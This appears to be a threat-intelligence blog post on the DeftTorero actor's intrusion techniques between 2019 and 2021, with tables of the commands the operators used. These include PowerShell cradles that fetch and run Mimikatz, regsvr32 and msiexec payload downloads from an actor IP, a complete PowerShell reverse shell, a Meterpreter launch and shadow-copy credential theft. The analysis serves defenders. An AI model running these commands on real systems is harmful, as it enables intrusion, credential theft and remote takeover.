Earlier this year, we started hunting for possible new DeftTorero (aka Lebanese Cedar, Volatile Cedar) artifacts. This threat actor is believed to originate from the Middle East and was publicly disclosed to the cybersecurity community as early as 2015. Notably, no other intelligence was shared until 2021, which led us to speculate on a possible shift by the threat actor to more fileless/LOLBINS techniques, and the use of known/common offensive tools publicly available on the internet that allows them to blend in.

The public reports available to date expose and discuss the final payload – Explosive RAT – and the webshells used in the initial foothold such as Caterpillar and ASPXSpy (you can find webshell MD5 hashes in the IoC section), with little on the tactics, techniques and procedures (TTPs); this post focuses primarily on the TTPs used by the threat actor in intrusions between late 2019 and mid-2021 to compromise victims.

More information about DeftTorero is available to customers of Kaspersky Intelligence Reporting.

Contact us: intelreports@kaspersky.com

Initial Access and webshell deployment

During our intrusion analysis of DeftTorero’s webshells, such as Caterpillar, we noticed traces that infer the threat actor possibly exploited a file upload form and/or a command injection vulnerability in a functional or staging website hosted on the target web server. This assumption is based on the fact that the uploaded webshells always drop in the same web folder, and in some cases get assigned a name containing a GUID followed by the original webshell filename.

In other instances, we noticed traces pointing to a possible exploitation of IIS PHP plugins pre-installed by the server admins. And finally, in some other instances, we suspect the operators gained server credentials from other systems in the same organization and logged in using a remote desktop (MSTSC.exe) to deploy the webshell.

Once the threat actor succeeds in identifying a method to upload a webshell, they attempt to drop several webshell types and families, most of which are blocked by the AV engine. We suspect that almost all the webshells dropped (including ASPXSpy, devilzshell, etc.) originate from a GitHub account, and are either used as is or are slightly modified.

Discovery

Upon successful installation of the webshell, the operators run multiple commands to gain situational awareness from the exploited system. This includes testing network connectivity by pinging Google.com, listing current folders, identifying the current user privileges, enumerating local system users, and listing websites hosted by the compromised server. The operators also attempt to assess if the web server is joined and/or trusted by any domain. At a later stage, this will prove useful as it will inform them on the next course of actions for dumping local or domain credentials.

CommandPurpose
cmd.exе /c whoаmiIdentify user privileges
cmd.exе /c аppcmd list siteList the hosted websites on the web server
cmd.exе /c nltеst /domain_trustsList domain controllers and enumerate domain trusts
cmd.exе /с dirList current directories and files
cmd.exе /c nеt viewDisplay a list of domains, computers, or resources that are being shared by the specified computer
cmd.exе /c sеtDisplay the current environment variable settings
cmd.exе /c systеminfoDisplay system profile and installed hotfixes
cmd.exе /c ipconfig -displаydnsDisplay DNS resolver cache
cmd.exе /c ipconfig -аllDisplay network configuration on all network interfaces
cmd.exе /c nеt userDisplay local users
cmd.exе /c nеt user /domainDisplay domain users
cmd.exе /c nеt useDisplay mapped drives to local system
cmd.exе /c opеnfilеsDisplay files opened remotely

Table. 1 Operator commands executed through webshell

After gaining situational awareness, the operators attempt to load/invoke a number of tools to dump local and domain credentials. In some cases, the threat actor attempts to install Nmap and Advanced Port Scanner, possibly to scan internal systems.

Dumping credentials

Credential dumping methods differed from one case to another. In some instances, Lazagne.exe was used, in others Mimikatz variants were used either by executing the respective PE binary or by invoking a base64-encoded PowerShell version from a GitHub project. In a smaller number of instances, possibly due to AV detection, the operators dumped the LSASS.exe process to disk, most probably to process it offline for credential dumping.

CommandComment
IEX (New-Object
Net.WebClient).DownloаdString(“httрs://raw.githubusercontеn
t.com/BC-
SECURITY/Empire/master/data/module_source/crеdentials/Invok
e-Mimikatz.ps1”); Invoke-Mimikаtz -Command
privilеge::dеbug; Invoke-Mimikаtz -DumpCrеds;
Decoded base64 command issued through webshell to invoke Mimikatz to dump passwords
IEX (New-Object
Net.WebClient).DownloаdString(‘httрs://raw.githubuserconten
t.com/putterpаnda/mimikittеnz/master/Invoke-
mimikittеnz.ps1’); Invoke-mimikittеnz
Decoded base64 command issued through webshell to invoke Mimikittenz to dump passwords

Table. 2 Operators invoking Mimikatz variants

Once credentials are obtained, it is believed the operators use Remote Desktop Protocol to pivot into internal systems, or reachable systems that are likely using the stolen credentials (e.g., trusted partners). This is also reinforced by timeline analysis where the threat actor deployed a webshell at another web server in the same network without exploiting a file upload form/vulnerability.

The many ways to achieve Execution

Further commands were executed to bypass the AV engine and establish a Meterpreter session with the operators’ C2 server. After a Meterpreter session is established, the operators attempt to again invoke Mimikatz variants to gain system and/or domain credentials. It’s worth mentioning that in older intrusions, the threat actor deployed Explosive RAT instead of using Meterpreter.

CommandComment
cmd.exе /c “regsvr32 /s /n /u /i:httр://200.159.87[.]196:3306/jsJ13j.sct
scrobj.dll 2>&1
Alternative methods to achieve command execution while bypassing security controls using LOLBINs such as REGSVR32 and MSIEXEC
cmd.exе /c “powershell -command “regsvr32 /s /n /u
/i:httр://200.159.87[.]196:3306/jsJ13j.sct scrobj.dll” 2>&1
cmd.exе /c “powershеll.exe -executionpolicy bypass -w hidden “iex(New-
Object
System.Net.WebClient).DownloadString(‘httр://200.159.87[.]196/made.ps1’)
; made.ps1” 2>&1
cmd.exе /c “powershеll.exe -c “(New-Object
System.NET.WеbClient).DownloadFile(‘httр://200.159.87[.]196/av.vbs’,”$e
nv:tempav.vbs”);Start-Procеss %windir%system32cscript.exе
”$env:tempav.vbs”” 2>&1
cmd.exe /c “powershеll.exe -executionpolicy bypass -w hidden “iex(New-
Object
System.Net.WebClient).DownloadString(‘httр://<internal_IP_address>:8000/
made.ps1′); made.ps1″ 2>&1
cmd.exe /c “powershеll -nop -c “$client = New-Object
System.Net.Sockets.TCPClient(‘200.159.87[.]196’,3306);$strеam =
$client.GеtStream();[byte[]]$bytes = 0..65535|%{0};while(($i =
$stream.Rеad($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object –
TypeName System.Text.ASCIIEncoding).GеtString($bytes,0, $i);$sendback =
(iex $data 2>&1 | Out-String );$sendback2 = $sendback + ‘PS ‘ +
(pwd).Path + ‘> ‘;$sеndbyte =
([text.encoding]::ASCII).GеtBytes($sendback2);$strеam.Write($sendbyte,0,
$sendbyte.Length);$stream.Flush()};$client.Close()” 2>&1
cmd.exe /c “msiеxec /q /i http://200.159.87[.]196/1.msi 2>&1
cmd.exe /c “Powershеll.exе -NoP -NonI -W Hidden -Exеc Bypass IEX (New-
Object
Net.WebClient).DownloadString(‘httрs://raw.githubusercontent[.]com/cheet
z/PowerSploit/master/CodeExеcution/Invoke–Shellcode.ps1’); Invoke-
Shellcode -Payload windows/metеrpreter/reverse_https -Lhost
200.159.87[.]196 -Lport 3306 -Force 2>&1
PowerShell command to invoke a Meterpreter session

Table. 3 Operator commands to establish further presence on other servers in the same network

Credentials: the more, the better

While the same credential dumping strategy has been used by the operators in most intrusions, there were some instances where few modifications were seen. For example, the operators used the VSSADMIN system tool to create a shadow copy snapshot on the targeted server in an attempt to dump domain credentials, a technique also used in pentesting and red team engagement.

CommandComment
CMD /C vssаdmin create shadow /for=E:Create a volume shadow copy to collect SAM and SYSTEM registry hives from local system, or NTDS.DIT and SYSTEM hives if on a domain controller
CMD /C vssаdmin list shadows /for=E:>Test if the above command worked

Table. 4 Creating a shadow copy

Defense Evasion: Explosive RAT modifications

We’ve barely seen Explosive RAT since 2019. However, it’s worth mentioning the tricks the author used in the versions that we know of. While the functionality of the malware didn’t change that much over time, the author made an effort to ensure its files wouldn’t be detected using publicly available signatures. The changes introduced were minimal but sufficient. The table below illustrates some changes made by the malware author. It is also noticeable that some strings mentioned in previous Yara rules disappeared from the newer version.

New PatternOld PatternPattern Description
DODDLDDelimiter used for malware configuration variables
Mozilla/5.0 (Windows NT 6.0; WOW64; rv:32.0) Gecko/20200101 Firefox/32.0Mozilla/4.0 (compatible; MSIE 7.0; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727)User Agent for HTTP Communication

Table. 5 Pattern changes in the newer Explosive RAT campaign

A second noticeable change made to evade defense was introduced to the function names exported by the DLL component of Explosive RAT. Below is a list of changes in the export table.

New Function NameOld Function Name
AllDataGetGetAllData
HistoryGetIEGetIEHistory
TOCNCON
FnClipOpenOpenClipFn
HoKSetWinSetWinHoK
appregisterRegisterapp
ProcessPathPathProcess

Table. 6 New function names compared to the old ones used in the 2015 campaign

Victims

Based on our telemetry, the indicators of the intrusions we assessed between late 2019 and mid-2021 are similar to the usual DeftTorero victimology, with a clear focus on Middle Eastern countries such as Egypt, Jordan, Kuwait, Lebanon, Saudi Arabia, Turkey and the United Arab Emirates.

The targeted web servers occasionally host multiple websites belonging to different industry verticals such as Corporate, Education, Government, Military, Media, and Telcos. This presents the threat actor with the opportunity to pivot to other victims of interest.

Conclusions

In this post, we described the potential tactics, techniques and procedures identified in previous DeftTorero intrusions that were largely missing from public reports. As our telemetry and public reports did not identify any new Explosive RAT detections after 2020, but only old slightly modified toolsets (e.g., Explosive RAT, webshells, etc.), the historical intrusions analysis we conducted suggest a potential TTP shift by the threat actor to more fileless/LOLBINS techniques, and the use of known/common offensive tools available on the internet. This TTP shift could explain the detection gap in previous years because using fileless techniques and public tools allows the operators to blend in with other threat activities.

There are two recommended defensive measures to combat such intrusions, aside from assessing web vulnerabilities, namely, monitoring web server file integrity and occasionally scanning web server backups; we have noticed that some of the threat actor post-exploitation tools were actually inside website backups, and continued to exist after the initial intrusion. If the backups were restored at a later stage, the threat actor could regain persistent access and continue where they left off.

If you want to learn more about DeftTorero activity and defense against this group, contact the Kaspersky Intelligence Reporting service at intelreports@kaspersky.com.

Indicators of Compromise

Note: We provide an incomplete list of IoCs here that are valid at the time of publication. A full IoC list is available in our private report.

File hashes

Post exploitation

Posted by Charlie